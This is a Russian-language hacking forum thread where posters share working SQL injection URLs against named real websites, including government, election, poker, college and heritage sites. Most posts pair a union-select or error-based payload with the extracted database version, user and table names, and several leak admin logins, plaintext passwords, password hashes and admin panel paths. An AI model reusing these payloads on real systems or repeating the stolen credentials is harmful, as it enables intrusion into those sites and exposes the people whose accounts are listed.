Чёт постов маловато.... silla.dk Code: http://www.silla.dk/nyhed.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/* 4.0.18-nt:silla1:silla@cher balatonfured.hu Code: http://www.balatonfured.hu/prg/nc/hirdomping2.php?&hir_lang=1&hir_akthely=61&hir_rovatid=116 &hir_hirid=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10/* 5.0.32-Debian_7etch1-log:balaton_admin:[email protected] Наша таба admins и в ней поля a_login_name и a_login_password Усё...
BlackCats, ты реально извращенец ) Code: 1+or+1=(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(select+top+[B][color=orange]50[/color][/B]+table_name+from+information_schema.tables))--
Code: http://www.[COLOR=Olive]tampereenpyrinto.fi[/COLOR]/news.php?id=-77+union+select+1,2,concat_ws(char(58,58),user(),database(),version()),4,5,6,7/* [email protected]::w8115768db::5.0.21 правда тормозит по-страшному
вот... http://adamaz.ru/?id=18'+union+select+1,2,3/* помогиет полность раскрыть... просто мне становится интересно скули раскрывать... хочу научиться ))
Sql-inj на официальном сайте президента Болгарии Зацените : HTML: http://www.president.bg/news.php?type=-6 Ну как?
Code: http://www.secureworldexpo.com/events/index.php?id=-230/**/union/**/select+1,VERSION(),3,4/* Code: http://www.brecorder.com/index.php?id=-465018+union+select+1,2,3,4,5,6,7,8,concat(user,0x3a,password),10,11,12,13,14+from+mysql.user/*
Code: http://www.ipoker.com/index.php?page=6&sub=1%22+union+select+1,2,concat(user(),0x3,version(),0x3,database()),4,5/* Чуток дополнил. Code: http://www.ipoker.com/index.php?page=6&sub=1%22+union+select+1,2,concat(user(),0x3,version(),0x3,database()),concat(username,0x3,password),5+from+ipoker_admin/* User: ipoker@playtech-banner1 Version: 4.1.22-standard-log Database: ipoker Admin username: dooker Password: 01cbad3d03f356443f5f79d62cf3680a
2 Momiji Попробуй таблицу ipoker_users Code: http://www.ipoker.com/index.php?p age=6&sub=1%22+UNION+SELECT+1,2, 3,4,5+ipoker_us ers/*
www.electionguide.org Code: http://www.electionguide.org/country-news.php?ID=-131+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50/* 4.1.20:eguide@localhost:eguide (вывод в титле) найдена таблица - users, дальше пока никак....
www.altruism.com.my Code: http://www.altruism.com.my/index.php?p=lb-detail&fid=-17+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13/* 4.1.22-community-nt:dbaatweb@localhost:atweb
www.heritage.gov.my скуля: Code: http://www.heritage.gov.my/kekkwa/viewbudaya.php?id=-3377+union+select+version(),2,3,4,5,6,7/*&stdout=1&PHPSESSID=cdc19ca65de6fe5b3d27592190423d83 5.0.45 таблицы: Code: http://www.heritage.gov.my/kekkwa/viewbudaya.php?id=-3377+union+select+TABLE_NAME,2,3,4,5,6,7+FROM+INFORMATION_SCHEMA.TABLES/*&stdout=1&PHPSESSID=cdc19ca65de6fe5b3d27592190423d83 интересные: 'buku_tamu'-'nama'(логин),'emel'(мыло) 'pentadbir' -'nama'(логин админов),'katalaluan'(пасс админов)... в названиях чуть голову не сломал...) Code: http://www.heritage.gov.my/kekkwa/viewbudaya.php?id=-3377+union+select+COLUMN_NAME,2,3,4,5,6,7+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=char(112,101,110,116,97,100,98,105,114)/*&stdout=1&PHPSESSID=cdc19ca65de6fe5b3d27592190423d83 логин:пасс nanie:9dRozi0uyhUnE zuraihan:f0tjlY5WLfiik murugan:murugan anishariah:$1$4FXU.gOL$IGKdSMr1BYdgIz3lMJMFH1 админка: Code: http://www.heritage.gov.my/kekkwa/webadmin/index.php
HTML: http://www.dmsbg.com/projects_details_actual.php?id=-39+UNION+SELECT+1,2,3,4,version(),6,7,8,9,10,11/* Не смог подобрать имена таблиц. Я завещаю вам продолжить мое благородное дело
http://www.thaitextile.org/ - Тайландский Институт Текстиля Code: http://www.thaitextile.org/member/about.asp?member_id=1+or+1=(SELECT+TOP+1+cast(shortname+as+nvarchar)%2B%27%3A%27%2Bcast(passwd+as+nvarchar)+from+member_list)--
Чешский бейсбольный клуб "Черные совы". www.univka.cz Пришлось юзать cast() =) Code: http://www.univka.cz/index.php?inc=news.php&id=-162+union+select+1,2,3,concat_ws(char(58),cast(version()+as+binary),cast(user()+as+binary),cast(database()+as+binary)),5 Version: 4.1.11-Debian_4sarge2banan-log User: univka.cz@localhost Database: univka_cz
www.wycliffecollege.ca Code: http://www.wycliffecollege.ca/section.php?aid=8+union+select+concat_ws(0x3a,version(),user(),database()),2/*&sid=38 4.1.11-standard-log:wycliffe@localhost:wycliffe
www.ieee.bg Code: http://www.ieee.bg/index.php?page=-1'+union+select+1,2,concat(version(),0x3,user(),0x3,database()),4/* Version: 4.1.22 User: wwwieee@localhost Database: ieee
сайт:http://www.bit-info.pl Code: http://www.bit-info.pl/baza.php?g=999999999;select+user,passwd,3+from+PG_shadow+limit+2+offset+0-- Версия: PostgreSQL 7.3.4 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 3.3.1 (SuSE Linux) Пользователь: postgres Таблицы в базе: pg_description pg_group pg_proc pg_rewrite pg_xactlock pg_type pg_attribute pg_class pg_inherits pg_index pg_operator pg_opclass pg_am pg_amop pg_amproc pg_language pg_largeobject pg_aggregate pg_trigger pg_listener pg_cast pg_namespace pg_shadow pg_conversion pg_depend pg_attrdef pg_constraint pg_database pg_statistic grupydzialy
